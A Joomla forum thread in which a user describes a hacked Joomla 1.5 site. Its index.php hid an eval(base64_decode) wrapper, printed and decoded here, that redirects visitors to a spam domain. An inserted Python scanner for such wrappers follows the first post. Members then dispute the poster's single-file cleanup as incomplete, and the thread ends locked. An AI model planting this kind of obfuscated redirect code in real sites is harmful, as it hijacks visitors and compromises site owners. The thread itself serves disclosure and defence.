The Joomla! Forum ™



Posted: Tue Jan 22, 2013 3:29 pm
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
Someone hacked one of my client's websites by changing the index.php file in the Joomla root. The site was redirecting after 25 seconds to shopforza .info which was somehow going to [spam].com. I started scanning some files for changed dates and found that /index.php was changed. I opened it and it was Base64 encoded which was a red flag since Joomla is open source.

Code:
<? eval(base64_decode('ZGVmaW5lKCAnX0pFWEVDJRvU3RyaW5nKCRtYWluZnJhbWUtPmdldENmZygnZ3ppcCcpKTs='));?>


That gets decoded to
Code:
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
eval(base64_decode('aGVhZGVyKCJSZTsgdXJsPVwiaHR0cDovL3Nob3Bmb3J6YS5pbmZvL25ldFwiIik7'));
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;


$mainframe =& JFactory::getApplication('site');



$mainframe->route();



echo JResponse::toString($mainframe->getCfg('gzip'));



Which also has more encoding which decodes to

Code:
header("Refresh: 25; url=\"http://shopforza .info/net\"");


Hopefully this will help someone get their site back and serve as a future reference...


Last edited by mandville on Tue Jan 22, 2013 5:11 pm, edited 2 times in total.
trimmed code, broke links, trimmed hack script.
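
As an added example (not part of the original post and not Joomla code): a static scanner for the pattern described above. It walks a site tree, finds `eval(base64_decode('...'))` wrappers in `.php` files, decodes nested layers without executing them, and lists any `header()` redirect targets. The sample files, the `redirect.example` domain and all function names are constructed for illustration.

```python
import base64, binascii, pathlib, re, tempfile

# eval(base64_decode('...')) with either quote style; the blob is captured, never executed.
EVAL_B64 = re.compile(r"""eval\s*\(\s*base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""", re.I)
# header("Refresh: N; url=...") or header("Location: ...") inside a decoded layer.
REDIRECT = re.compile(r"""header\s*\(\s*["'](?:Refresh:\s*\d+;\s*url=|Location:\s*)\\?["']?([^"'\\\s]+)""", re.I)

def peel_layers(source, depth=1, max_depth=10):
    """Statically decode nested wrappers; returns [(depth, text or None if undecodable)]."""
    layers = []
    for match in EVAL_B64.finditer(source):
        try:
            decoded = base64.b64decode(match.group(2)).decode("latin-1")
        except (binascii.Error, ValueError):
            decoded = None  # trimmed or corrupt blob: flag it for manual review
        layers.append((depth, decoded))
        if decoded and depth < max_depth:
            layers += peel_layers(decoded, depth + 1, max_depth)
    return layers

def scan_tree(root):
    """Report every .php file under root that carries an encoded eval wrapper."""
    findings = {}
    for path in sorted(pathlib.Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() == ".php":
            layers = peel_layers(path.read_text(encoding="latin-1"))
            if layers:
                findings[str(path.relative_to(root))] = {
                    "depth": max(d for d, _ in layers),
                    "undecodable": sum(1 for _, t in layers if t is None),
                    "redirects": [u for _, t in layers if t for u in REDIRECT.findall(t)]}
    return findings

def build_sample_site(root):
    """Constructed sample files: a two-layer wrapper, a clean file, a trimmed blob."""
    b64 = lambda s: base64.b64encode(s.encode()).decode()
    inner = 'header("Refresh: 25; url=\\"http://redirect.example/net\\"");'
    outer = "define( '_JEXEC', 1 );\neval(base64_decode('%s'));\n" % b64(inner)
    samples = {"index.php": "<? eval(base64_decode('%s'));?>" % b64(outer),
               "clean.php": "<?php echo 'hello'; ?>",
               "trimmed.php": "<? eval(base64_decode('ZGVmaW5lK'));?>"}
    for name, body in samples.items():
        pathlib.Path(root, name).write_text(body, encoding="latin-1")

def demo():
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        return scan_tree(site)
```

Files reported with `undecodable` above zero carry a blob that did not decode (as with the trimmed code in this post) and need manual review.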


Posted: Tue Jan 22, 2013 3:32 pm
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
This forum's filter is removing the site name which could be important for SEO. My client's site was being redirected to [spam] (dot) com, [spam].com, [spam] .com. I am not spamming! This could help someone find their compromised files quicker and fix their website.

BTW the site was running Joomla 1.5.26.


Posted: Tue Jan 22, 2013 5:14 pm
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12512
Location: The Girly Side of Joomla in Sussex
Please follow the forum sticky regarding posting the FPA to assist us in assisting you.

Regarding your complaint that the forum censor is acting properly: how would the hacked site URL be relevant and a boost for SEO? There is no moral value in promoting/sending someone to a hacked site.
Following the forum sticky and checklist 7 is a great start for getting a hacked site repaired quickly.

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Posted: Tue Jan 22, 2013 5:59 pm
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
mandville wrote:
Please follow the forum sticky regarding posting the FPA to assist us in assisting you.

Huh? Why? I am posting a solution, not a question. I found out why my site was being redirected and how. I posted this hoping to help someone else.

mandville wrote:
Regarding your complaint that the forum censor is acting properly: how would the hacked site URL be relevant and a boost for SEO? There is no moral value in promoting/sending someone to a hacked site.
Following the forum sticky and checklist 7 is a great start for getting a hacked site repaired quickly.


If someone searched for "joomla 1.5 redirect xyz.com" or "joomla 1.5 hacked xyz.com" this post should come up, simple SEO. Obviously that would require the correct domain name to be listed, which your filters are preventing.


Posted: Tue Jan 22, 2013 7:44 pm
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12512
Location: The Girly Side of Joomla in Sussex
I cannot see how your post actually resolved the hijack/hack etc. If you had searched online you would have found that both the links you posted (including the URL in the topic title which is not permitted under forum rules) would have led the unwary/inquisitive to a malware dropping site including several resolutions to the browser hijack.

From experience "most" people would not search, they would post a help - hacked topic. Which of course still leaves the fact you posted direct links to malware dropping sites. Now you know the reason they are censored on this forum.

How did you resolve your client's hack?

Posted: Tue Jan 22, 2013 7:48 pm
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
mandville wrote:
How did you resolve your client's hack?


Um, replaced index.php with a non hacked version...thought that was obvious.


Posted: Tue Jan 22, 2013 8:33 pm
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25815
Location: @Webdongle
prophotodx wrote:
mandville wrote:
How did you resolve your client's hack?


Um, replaced index.php with a non hacked version...thought that was obvious.

That is equivalent to repainting one wall after someone broke into a building and trashed the place. It does nothing to fix other damage and it does nothing to secure the site to prevent it happening again.

_________________
'When I'm right nobody remembers when I'm wrong nobody forgets.'

http://weblinksonline.co.uk/joomla-faq.html
http://www.weblinksonline.co.uk/updating-joomla.html


Posted: Tue Jan 22, 2013 8:37 pm
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
Webdongle wrote:
prophotodx wrote:
mandville wrote:
How did you resolve your client's hack?


Um, replaced index.php with a non hacked version...thought that was obvious.

That is equivalent to repainting one wall after someone broke into a building and trashed the place. It does nothing to fix other damage and it does nothing to secure the site to prevent it happening again.


The site has been secured, at least as secure as a 1.5 site can get. It wasn't done before, that's why it happened.


Posted: Tue Jan 22, 2013 9:16 pm
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25815
Location: @Webdongle
prophotodx wrote:
...
The site has been secured... It wasn't done before, that's why it happened.
But because you have not deleted all the files then it is not certain the site is secure. You may have looked for other hacked files and not seen any ... but that does not mean they are not there. The only way to be certain is to delete all the files and replace with fresh ones.

Posted: Tue Jan 22, 2013 9:28 pm
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
Webdongle wrote:
prophotodx wrote:
...
The site has been secured... It wasn't done before, that's why it happened.
But because you have not deleted all the files then it is not certain the site is secure. You may have looked for other hacked files and not seen any ... but that does not mean they are not there. The only way to be certain is to delete all the files and replace with fresh ones.

I don't understand why you are arguing with me...SITE HAS BEEN SECURED, THIS IS A POST FOR FUTURE REFERENCE FOR OTHERS...


Posted: Tue Jan 22, 2013 9:57 pm
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25815
Location: @Webdongle
prophotodx wrote:
...
I don't understand why you are arguing with me...SITE HAS BEEN SECURED...
I am not arguing with you, I am telling you a fact. Unless all the files have been deleted then it is not 100% certain the site is secure. It is you that is shouting.


prophotodx wrote:
...
THIS IS A POST FOR FUTURE REFERENCE FOR OTHERS...
And that is why the facts must be told. Unless all the files have been deleted then it is not 100% certain the site is secure. On large sites with professional IT staff it is possible to be reasonably sure using other methods. But this forum has many inexperienced users (some even have to be told how to copy/paste). To start a thread as a 'future reference for others' and only state that replacing the "index.php with a non hacked version" ... is at the least very irresponsible.

To start such a thread after making c. 40 posts and asking basic questions is [spam]. If you wish to ignore the advice on viewtopic.php?f=432&t=475313 that is up to you. But to make c. 40 posts (that clearly show your lack of knowledge) then give bad advice ... needs to be addressed for the sake of the inexperienced users who read this thread.

Posted: Tue Jan 22, 2013 10:17 pm
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
Amazing how someone who is supposed to be helping is only continuing to argue with me and tell me I'm a noob when they don't even know me. All you had to say was 'for others with this issue be sure to read through this thread xxxxx.xxxxx to be sure your site is secure' instead of defaming me.


Posted: Tue Jan 22, 2013 10:50 pm
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25815
Location: @Webdongle
prophotodx wrote:
Amazing how someone who is supposed to be helping is only continuing to argue with me and tell me I'm a noob ...
I am not arguing with you and I am not arguing with you. I am stating a fact that many of the users on the forum are inexperienced ... and that it is irresponsible for you to suggest that replacing the index.php file makes the site secure.



prophotodx wrote:
... All you had to say was 'for others with this issue be sure to read through this thread xxxxx.xxxxx to be sure your site is secure' instead of defaming me.
I explained why it was necessary to delete all the files. And explained that there are other methods that experienced IT experts can use. Also I explained that your method was not suitable for inexperienced users.

I did not 'defame' you ... all I did was point out you make c. 40 posts asking basic questions then start a thread that has inaccurate and incomplete information.

You are the one that is arguing, you argue when an experienced moderator has the need to edit your posts. And you argue 'black is white' when the facts are placed in front of you. Then you accuse me of just pointing to a 'sticky' thread.

The crux of the matter is that you posted information that was not accurate and could mislead inexperienced users to ignore the most effective method. My posts were (and are not) personal attacks on you. My posts are for the inexperienced users who may have read your posts so they could see the flaws in the logic of what you posted.

Posted: Wed Jan 23, 2013 4:20 pm
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
Webdongle wrote:
I am not arguing with you and I am not arguing with you. I am stating a fact that many of the users on the forum are inexperienced ... and that it is irresponsible for you to suggest that replacing the index.php file makes the site secure.

Just the fact that you continue to post and argue that you are not arguing shows your need to be right. Stop posting and then the argument will be over.


Webdongle wrote:
The crux of the matter is that you posted information that was not accurate and could mislead inexperienced users to ignore the most effective method. My posts were (and are not) personal attacks on you. My posts are for the inexperienced users who may have read your posts so they could see the flaws in the logic of what you posted.

I consider it a personal attack which is not how an 'experienced moderator' should act. Your actions and attitude are a poor reflection on the Joomla community and this forum. No wonder people hate posting here hoping for help, even the mods have a bad attitude.


Posted: Wed Jan 23, 2013 4:54 pm
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25815
Location: @Webdongle
prophotodx wrote:
...
Just the fact that you continue to post and argue that you are not arguing shows your need to be right. Stop posting and then the argument will be over.
...
Stating facts is not arguing it is debating a point. And the point is the advice you posted was incorrect, inaccurate and misleading to inexperienced users. Your other posts do nothing to qualify your statement and only try to confuse the issue by evading the main point.



prophotodx wrote:
...
I consider it a personal attack which is not how an 'experienced moderator' should act. Your actions and attitude are a poor reflection on the Joomla community and this forum. No wonder people hate posting here hoping for help, even the mods have a bad attitude.
A difference of opinion is not a personal attack it is just a different opinion ... no more no less. The fact that you take objection with someone having a different opinion to yours is a reflection on you not anyone else. As for you claiming people hate posting here ... The amount of posts (especially solved posts) proves your statement incorrect.

Again (for the inexperienced users who read this thread) ... just replacing the index.php file is not enough to remove the hack and secure the site. Before you post please read this gives specific instructions on how to do that.

There are similar instructions for 2.5 viewtopic.php?f=621&t=582854 and 3.0 viewtopic.php?f=714&t=757645

Posted: Wed Jan 23, 2013 4:56 pm
Joomla! Intern

Joined: Tue Feb 23, 2010 5:36 pm
Posts: 70
Hey look, Webdongle still can't leave this alone!!! That's a great mod for you...


Posted: Wed Jan 23, 2013 6:08 pm
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12512
Location: The Girly Side of Joomla in Sussex
Degenerating topic locked.
Webdongle is not a moderator, nor does he claim to be.
